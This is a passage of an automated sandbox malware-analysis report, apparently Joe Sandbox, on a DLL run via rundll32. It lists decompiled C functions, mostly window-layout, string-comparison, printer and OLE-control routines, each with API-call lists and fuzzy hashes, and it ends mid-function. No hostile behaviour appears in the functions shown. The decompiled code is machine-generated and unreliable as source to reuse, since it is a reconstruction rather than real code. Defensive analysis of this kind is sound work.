                                                                        							_t85 = _a20;
                                                                        							_v36.left = _v36.left +  *_t85;
                                                                        							_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
                                                                        							_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
                                                                        							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
                                                                        						}
                                                                        						if((_a17 & 0x00000080) == 0) {
                                                                        							 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
                                                                        							_t62 = E10020D81( &_v40, _v8,  &_v36);
                                                                        						}
                                                                        					}
                                                                        					if(_v40 != 0) {
                                                                        						_t62 = EndDeferWindowPos(_v40);
                                                                        					}
                                                                        				} else {
                                                                        					if(_a28 == 0) {
                                                                        						_t62 = _a20;
                                                                        						 *((intOrPtr*)(_t62 + 8)) = _v20;
                                                                        						 *((intOrPtr*)(_t62 + 4)) = 0;
                                                                        						 *_t62 = 0;
                                                                        						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
                                                                        					} else {
                                                                        						_t62 = CopyRect(_a20,  &_v36);
                                                                        					}
                                                                        				}
                                                                        				return _t62;
                                                                        			}




















                                                                        APIs
                                                                        • GetClientRect.USER32 ref: 100224CC
                                                                        • BeginDeferWindowPos.USER32(00000008), ref: 100224E4
                                                                        • GetTopWindow.USER32(?), ref: 100224F6
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 10022501
                                                                        • SendMessageA.USER32 ref: 10022533
                                                                        • GetWindow.USER32(00000000,00000002), ref: 1002253C
                                                                        • CopyRect.USER32 ref: 1002255A
                                                                        • EndDeferWindowPos.USER32(00000000), ref: 100225D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                        • String ID:
                                                                        • API String ID: 1228040700-0
                                                                        • Opcode ID: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                        • Instruction ID: a778dc46a9958f4d0915ef63e23ed223fa2105f0a807d6ecff0719afcf2b0a04
                                                                        • Opcode Fuzzy Hash: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                        • Instruction Fuzzy Hash: D741477190062AEFCF11DFD4E8A49EEB7B5FF08340B51816AF905A7251C734AA50CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002535C(void* __ebx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
                                                                        				intOrPtr _v8;
                                                                        				short _v528;
                                                                        				short _v1048;
                                                                        				short _v1568;
                                                                        				intOrPtr _t18;
                                                                        				int _t20;
                                                                        				int _t21;
                                                                        				void* _t23;
                                                                        				char* _t32;
                                                                        				int _t37;
                                                                        				char* _t42;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        
                                                                        				_t18 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t42 = _a4;
                                                                        				_v8 = _t18;
                                                                        				if(lstrcmpiA(_t42, _a8) == 0) {
                                                                        					_t20 = GetSystemMetrics(0x2a);
                                                                        					if(_t20 != 0) {
                                                                        						_t21 = lstrlenA(_t42);
                                                                        						if(_t21 != lstrlenA(_a8)) {
                                                                        							L13:
                                                                        							_t23 = 0;
                                                                        						} else {
                                                                        							_t37 = GetThreadLocale();
                                                                        							GetStringTypeA(_t37, 1, _t42, 0xffffffff,  &_v528);
                                                                        							GetStringTypeA(_t37, 4, _t42, 0xffffffff,  &_v1048);
                                                                        							GetStringTypeA(_t37, 1, _a8, 0xffffffff,  &_v1568);
                                                                        							_t32 = _t42;
                                                                        							if( *_t42 == 0) {
                                                                        								L10:
                                                                        								_t23 = 1;
                                                                        							} else {
                                                                        								_t47 = 0;
                                                                        								while(( *(_t49 + _t47 - 0x414) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x20c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x61c))) {
                                                                        									_t47 = _t47 + 2;
                                                                        									if( *_t32 != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L10;
                                                                        									}
                                                                        									goto L11;
                                                                        								}
                                                                        								goto L13;
                                                                        							}
                                                                        						}
                                                                        						L11:
                                                                        					} else {
                                                                        						_t23 = _t20 + 1;
                                                                        					}
                                                                        				} else {
                                                                        					_t23 = 0;
                                                                        				}
                                                                        				return E100117AE(_t23, _v8);
                                                                        			}

















                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                        • GetSystemMetrics.USER32 ref: 10025388
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystemlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 2335526769-0
                                                                        • Opcode ID: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                        • Instruction ID: 2e24e30c7814501e8ef39cdb76116c26bdbe99ae311f6264528fd307033058d9
                                                                        • Opcode Fuzzy Hash: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                        • Instruction Fuzzy Hash: BD21677150022D7ADB01EBB09C44FDEBBACEB453B2FA08661FC12D61C1D6718E818B64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E1001F60C(void* __ecx, char* _a4) {
                                                                        				void* _v8;
                                                                        				void* _t15;
                                                                        				void* _t20;
                                                                        				void* _t35;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t35 = __ecx;
                                                                        				_t15 =  *(__ecx + 0x70);
                                                                        				if(_t15 != 0) {
                                                                        					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                        					if(_t15 == 0) {
                                                                        						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                        						if(_t15 != 0) {
                                                                        							_t18 =  *(_t35 + 0x6c);
                                                                        							if( *(_t35 + 0x6c) != 0) {
                                                                        								E10029C1B(_t18);
                                                                        							}
                                                                        							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                        							 *(_t35 + 0x6c) = _t20;
                                                                        							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                        								E10029C1B( *(_t35 + 0x6c));
                                                                        								 *(_t35 + 0x6c) = 0;
                                                                        							}
                                                                        							_t15 = ClosePrinter(_v8);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t15;
                                                                        			}








                                                                        APIs
                                                                        • GlobalLock.KERNEL32 ref: 1001F629
                                                                        • lstrcmpA.KERNEL32(?,?), ref: 1001F635
                                                                        • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001F647
                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F667
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F66F
                                                                        • GlobalLock.KERNEL32 ref: 1001F679
                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001F686
                                                                        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001F69E
                                                                          • Part of subcall function 10029C1B: GlobalFlags.KERNEL32(?), ref: 10029C25
                                                                          • Part of subcall function 10029C1B: GlobalUnlock.KERNEL32(?,00000000,?,1001F698,?,00000000,?,?,00000000,00000000,00000002), ref: 10029C36
                                                                          • Part of subcall function 10029C1B: GlobalFree.KERNEL32 ref: 10029C41
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                        • String ID:
                                                                        • API String ID: 168474834-0
                                                                        • Opcode ID: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                        • Instruction ID: 2a491371b327142203fc8723eb74c2771e75d1908c59da801caef355c7fd3301
                                                                        • Opcode Fuzzy Hash: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                        • Instruction Fuzzy Hash: 61118E76500208BEDB12DBAACC86D7F7AFDEF85784B50081DF645EA122D671ED80DB24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E100074F2(void* __ebx, void* __edi, void* __esi) {
                                                                        				intOrPtr _t132;
                                                                        				int* _t133;
                                                                        				int _t138;
                                                                        				intOrPtr* _t139;
                                                                        				int _t142;
                                                                        				int* _t143;
                                                                        				int _t146;
                                                                        				int _t171;
                                                                        				intOrPtr _t172;
                                                                        				int _t173;
                                                                        				intOrPtr _t178;
                                                                        				int _t183;
                                                                        				int _t186;
                                                                        				void* _t187;
                                                                        				int* _t191;
                                                                        				void* _t213;
                                                                        				int* _t216;
                                                                        				short _t217;
                                                                        				intOrPtr* _t225;
                                                                        				void* _t227;
                                                                        				struct tagRECT _t228;
                                                                        				int* _t229;
                                                                        				signed int _t233;
                                                                        				int* _t235;
                                                                        				int* _t237;
                                                                        				int* _t238;
                                                                        				void* _t239;
                                                                        
                                                                        				_t227 = __esi;
                                                                        				E10011BF0(0x1003a548, _t239);
                                                                        				_t132 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t225 =  *((intOrPtr*)(_t239 + 0x14));
                                                                        				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
                                                                        				_t183 = 0;
                                                                        				_t133 = _t225 + 0x12;
                                                                        				 *(_t239 - 0x34) = _t133;
                                                                        				if( *(_t239 + 0x10) != 0) {
                                                                        					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
                                                                        					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
                                                                        					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
                                                                        					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
                                                                        					 *((short*)(_t239 - 0x4a)) =  *_t133;
                                                                        					_t216 = _t225 + 0x18;
                                                                        					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
                                                                        					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
                                                                        					_t225 = _t239 - 0x58;
                                                                        					 *(_t239 - 0x34) = _t216;
                                                                        				}
                                                                        				_t217 =  *((short*)(_t225 + 0xa));
                                                                        				_push(_t227);
                                                                        				_t228 =  *((short*)(_t225 + 8));
                                                                        				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
                                                                        				 *(_t239 - 0x68) = _t228;
                                                                        				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
                                                                        				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
                                                                        				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
                                                                        				_t229 =  *(_t239 + 0x1c);
                                                                        				 *(_t239 - 0x28) = _t183;
                                                                        				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
                                                                        					_t186 =  *_t229;
                                                                        					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
                                                                        					_t229 =  &(_t229[1]);
                                                                        					if(_t186 > 0) {
                                                                        						__imp__#4(_t229, _t186);
                                                                        						_t187 = _t186 + _t186;
                                                                        						_t229 = _t229 + _t187;
                                                                        						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
                                                                        						 *(_t239 - 0x28) = _t138;
                                                                        					}
                                                                        					_t183 = 0;
                                                                        				}
                                                                        				 *(_t239 - 0x2c) = _t183;
                                                                        				_t139 = E100243B2();
                                                                        				_t218 =  *_t139;
                                                                        				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
                                                                        				 *(_t239 - 4) = _t183;
                                                                        				 *(_t239 - 0x38) = _t183;
                                                                        				 *(_t239 - 0x3c) = _t183;
                                                                        				 *(_t239 - 0x30) = _t183;
                                                                        				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
                                                                        					_t142 =  *_t229;
                                                                        					_t49 = _t142 - 0xc; // -28
                                                                        					_t191 = _t49;
                                                                        					_t229 =  &(_t229[3]);
                                                                        					 *(_t239 - 0x40) = _t142;
                                                                        					 *(_t239 + 0x1c) = _t191;
                                                                        					if(_t191 > _t183) {
                                                                        						do {
                                                                        							_t171 =  *_t229;
                                                                        							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
                                                                        							_t235 =  &(_t229[1]);
                                                                        							_t229 =  &(_t235[0]);
                                                                        							 *(_t239 - 0x44) = _t171;
                                                                        							 *(_t239 + 0x10) =  *_t235;
                                                                        							if(_t171 != 0x80010001) {
                                                                        								_t172 = E1001F77E(0x1c);
                                                                        								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
                                                                        								__eflags = _t172 - _t183;
                                                                        								 *(_t239 - 4) = 1;
                                                                        								if(_t172 == _t183) {
                                                                        									_t173 = 0;
                                                                        									__eflags = 0;
                                                                        								} else {
                                                                        									_t173 = E1000B256(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
                                                                        								}
                                                                        								 *(_t239 - 4) = 0;
                                                                        								 *(_t239 - 0x2c) = _t173;
                                                                        							} else {
                                                                        								_t237 =  &(_t229[1]);
                                                                        								 *(_t239 - 0x3c) =  *_t229;
                                                                        								_t238 =  &(_t237[3]);
                                                                        								 *(_t239 - 0x30) =  *_t237;
                                                                        								E10006AEC(_t239 + 0x14, _t238);
                                                                        								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
                                                                        								_t213 = 0xffffffef;
                                                                        								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
                                                                        								_t229 = _t238 + _t178 + 1;
                                                                        								 *(_t239 - 0x38) =  *(_t239 + 0x10);
                                                                        							}
                                                                        						} while ( *(_t239 + 0x1c) > _t183);
                                                                        						_t142 =  *(_t239 - 0x40);
                                                                        					}
                                                                        					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
                                                                        					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
                                                                        				}
                                                                        				_t143 =  *(_t239 - 0x34);
                                                                        				_t256 =  *_t143 - 0x7b;
                                                                        				_push(_t239 - 0x20);
                                                                        				_push(_t143);
                                                                        				if( *_t143 != 0x7b) {
                                                                        					__imp__CLSIDFromProgID();
                                                                        				} else {
                                                                        					__imp__CLSIDFromString();
                                                                        				}
                                                                        				_push(_t183);
                                                                        				_push( *((intOrPtr*)(_t239 + 0x20)));
                                                                        				_push(_t229);
                                                                        				 *(_t239 + 0x1c) = _t143;
                                                                        				E1002EC6C(_t239 - 0x94, _t256);
                                                                        				 *(_t239 - 4) = 2;
                                                                        				 *(_t239 - 0x24) = _t183;
                                                                        				asm("sbb esi, esi");
                                                                        				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
                                                                        				if( *(_t239 + 0x1c) >= _t183 && E100090DE( *((intOrPtr*)(_t239 + 8))) != 0 && E10009A9F( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
                                                                        					E1000A762( *(_t239 - 0x24), 1);
                                                                        					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
                                                                        					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
                                                                        					E100074A5(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
                                                                        					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
                                                                        					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
                                                                        					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
                                                                        				}
                                                                        				if( *(_t239 - 0x28) != _t183) {
                                                                        					__imp__#6( *(_t239 - 0x28));
                                                                        				}
                                                                        				_t146 =  *(_t239 - 0x24);
                                                                        				if(_t146 == _t183) {
                                                                        					 *( *(_t239 + 0x24)) = _t183;
                                                                        				} else {
                                                                        					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
                                                                        					_t183 = 1;
                                                                        				}
                                                                        				 *(_t239 - 4) = 0;
                                                                        				E1002EFD7(_t183, _t239 - 0x94, _t218);
                                                                        				E100014B0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
                                                                        				return E100117AE(_t183,  *((intOrPtr*)(_t239 - 0x10)));
                                                                        			}






























                                                                        0x1000768f
                                                                        0x1000768f
                                                                        0x10007696
                                                                        0x10007699
                                                                        0x100076a0
                                                                        0x100076a1
                                                                        0x100076a2
                                                                        0x100076ac
                                                                        0x100076a4
                                                                        0x100076a4
                                                                        0x100076a4
                                                                        0x100076b2
                                                                        0x100076b3
                                                                        0x100076bc
                                                                        0x100076bd
                                                                        0x100076c0
                                                                        0x100076d7
                                                                        0x100076db
                                                                        0x100076de
                                                                        0x100076e0
                                                                        0x100076e5
                                                                        0x10007734
                                                                        0x10007748
                                                                        0x10007754
                                                                        0x10007767
                                                                        0x10007773
                                                                        0x10007780
                                                                        0x1000778c
                                                                        0x1000778c
                                                                        0x10007796
                                                                        0x1000779b
                                                                        0x1000779b
                                                                        0x100077a1
                                                                        0x100077a6
                                                                        0x100077b8
                                                                        0x100077a8
                                                                        0x100077b0
                                                                        0x100077b2
                                                                        0x100077b2
                                                                        0x100077c0
                                                                        0x100077c4
                                                                        0x100077cf
                                                                        0x100077d8
                                                                        0x100077eb

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 100074F7
                                                                        • MapDialogRect.USER32(?,?), ref: 10007585
                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 100075A6
                                                                        • CLSIDFromString.OLE32(?,00000004), ref: 100076A4
                                                                        • CLSIDFromProgID.OLE32(?,00000004), ref: 100076AC
                                                                        • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007748
                                                                        • SysFreeString.OLEAUT32(?), ref: 1000779B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                        • String ID:
                                                                        • API String ID: 493809305-0
                                                                        • Opcode ID: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                        • Instruction ID: 430f13df2ed8550076e5f7c2e9f31eb497c55eb67174fe5e7936e43fbe5827de
                                                                        • Opcode Fuzzy Hash: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                        • Instruction Fuzzy Hash: F5A12475D00619DFDB04CFA8C884AEDBBF4FF08344F118529E819AB251E735AE90CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 29%
                                                                        			E1002DA8D(intOrPtr __ecx, void* __edx) {
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t60;
                                                                        				signed char _t65;
                                                                        				signed int _t70;
                                                                        				signed int _t71;
                                                                        				intOrPtr _t109;
                                                                        				signed int _t115;
                                                                        				signed int _t117;
                                                                        				void* _t133;
                                                                        				void* _t135;
                                                                        				intOrPtr _t140;
                                                                        				void* _t143;
                                                                        				void* _t145;
                                                                        
                                                                        				_t133 = __edx;
                                                                        				_t143 = _t145 - 0xa8;
                                                                        				_t60 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t140 =  *((intOrPtr*)(_t143 + 0xb0));
                                                                        				 *((intOrPtr*)(_t143 + 0xa4)) = _t60;
                                                                        				_t109 = __ecx;
                                                                        				_t62 = GetWindowRect( *(_t140 + 0x1c), _t143 - 0x80);
                                                                        				if( *((intOrPtr*)(_t140 + 0x88)) != _t109 ||  *(_t143 + 0xb4) != 0 && EqualRect(_t143 - 0x80,  *(_t143 + 0xb4)) == 0) {
                                                                        					if( *((intOrPtr*)(_t109 + 0x90)) != 0 && ( *(_t140 + 0x80) & 0x00000040) != 0) {
                                                                        						 *(_t109 + 0x7c) =  *(_t109 + 0x7c) | 0x00000040;
                                                                        					}
                                                                        					 *(_t109 + 0x7c) =  *(_t109 + 0x7c) & 0xfffffff9;
                                                                        					_t65 =  *(_t140 + 0x7c) & 0x00000006 |  *(_t109 + 0x7c);
                                                                        					 *(_t109 + 0x7c) = _t65;
                                                                        					if((_t65 & 0x00000040) == 0) {
                                                                        						_push(0x104);
                                                                        						_push(_t143 - 0x60);
                                                                        						E1002095F(_t140);
                                                                        						E10029B23(_t140,  *((intOrPtr*)(_t109 + 0x1c)), _t143 - 0x60);
                                                                        					}
                                                                        					_t70 = ( *(_t140 + 0x7c) ^  *(_t109 + 0x7c)) & 0x0000f000 ^  *(_t140 + 0x7c) | 0x00000f00;
                                                                        					if( *((intOrPtr*)(_t109 + 0x90)) == 0) {
                                                                        						_t71 = _t70 & 0xfffffffe;
                                                                        					} else {
                                                                        						_t71 = _t70 | 0x00000001;
                                                                        					}
                                                                        					E100383D0(_t140, _t71);
                                                                        					_push(0xffffffff);
                                                                        					_t135 = E1002CDCE(_t109, GetDlgCtrlID( *(_t140 + 0x1c)) & 0x0000ffff);
                                                                        					if(_t135 > 0) {
                                                                        						 *((intOrPtr*)(E100086F2(_t109 + 0x94, _t135))) = _t140;
                                                                        					}
                                                                        					if( *(_t143 + 0xb4) == 0) {
                                                                        						if(_t135 < 1) {
                                                                        							_t137 = _t109 + 0x94;
                                                                        							E1001E2BE(_t109 + 0x94, _t143,  *((intOrPtr*)(_t109 + 0x9c)), _t140);
                                                                        							E1001E2BE(_t137, _t143,  *((intOrPtr*)(_t137 + 8)), 0);
                                                                        						}
                                                                        						_t115 =  *0x1004efa4; // 0x2
                                                                        						_push(0x115);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push( ~_t115);
                                                                        						_t117 =  *0x1004efa0; // 0x2
                                                                        						_push( ~_t117);
                                                                        						_push(0);
                                                                        					} else {
                                                                        						CopyRect(_t143 - 0x70,  *(_t143 + 0xb4));
                                                                        						E10028E5A(_t109, _t143 - 0x70);
                                                                        						if(_t135 < 1) {
                                                                        							asm("cdq");
                                                                        							asm("cdq");
                                                                        							_push(( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)) - _t133 >> 1) +  *((intOrPtr*)(_t143 - 0x6c)));
                                                                        							_push(( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70) - _t133 >> 1) +  *(_t143 - 0x70));
                                                                        							_push( *((intOrPtr*)(_t143 + 0xb0)));
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							E1002CE2A(_t109);
                                                                        							_t140 =  *((intOrPtr*)(_t143 + 0xb0));
                                                                        						}
                                                                        						_push(0x114);
                                                                        						_push( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)));
                                                                        						_push( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70));
                                                                        						_push( *((intOrPtr*)(_t143 - 0x6c)));
                                                                        						_push( *(_t143 - 0x70));
                                                                        						_push(0);
                                                                        					}
                                                                        					E100204FE(_t140);
                                                                        					if(E100220EE(_t143, GetParent( *(_t140 + 0x1c))) != _t109) {
                                                                        						E1000870E(_t140, _t109);
                                                                        					}
                                                                        					_t120 =  *((intOrPtr*)(_t140 + 0x88));
                                                                        					if( *((intOrPtr*)(_t140 + 0x88)) != 0) {
                                                                        						E1002D1B2(_t120, _t140, 0xffffffff, 0);
                                                                        					}
                                                                        					 *((intOrPtr*)(_t140 + 0x88)) = _t109;
                                                                        					 *(E100314D8(_t109) + 0xcc) =  *(_t62 + 0xcc) | 0x0000000c;
                                                                        				}
                                                                        				return E100117AE(_t62,  *((intOrPtr*)(_t143 + 0xa4)));
                                                                        			}


















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$CopyCtrlEqualParentWindow
                                                                        • String ID: @
                                                                        • API String ID: 2544134605-2766056989
                                                                        • Opcode ID: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                        • Instruction ID: b45b6ef3e14a7e4d87b63386d5d067ae84193d18a4a25c559dd4ceadf4ed8576
                                                                        • Opcode Fuzzy Hash: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                        • Instruction Fuzzy Hash: E651BA716006499FDF25DF68DC95BAE77AAFF44300F504529E91ADB1A2CB30AD05CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E10021B92(intOrPtr* __ecx, signed int _a4) {
                                                                        				struct HWND__* _v4;
                                                                        				struct tagMSG* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				struct HWND__* _t42;
                                                                        				signed int _t45;
                                                                        				int _t53;
                                                                        				long _t56;
                                                                        				int _t62;
                                                                        				intOrPtr* _t69;
                                                                        
                                                                        				_t62 = 1;
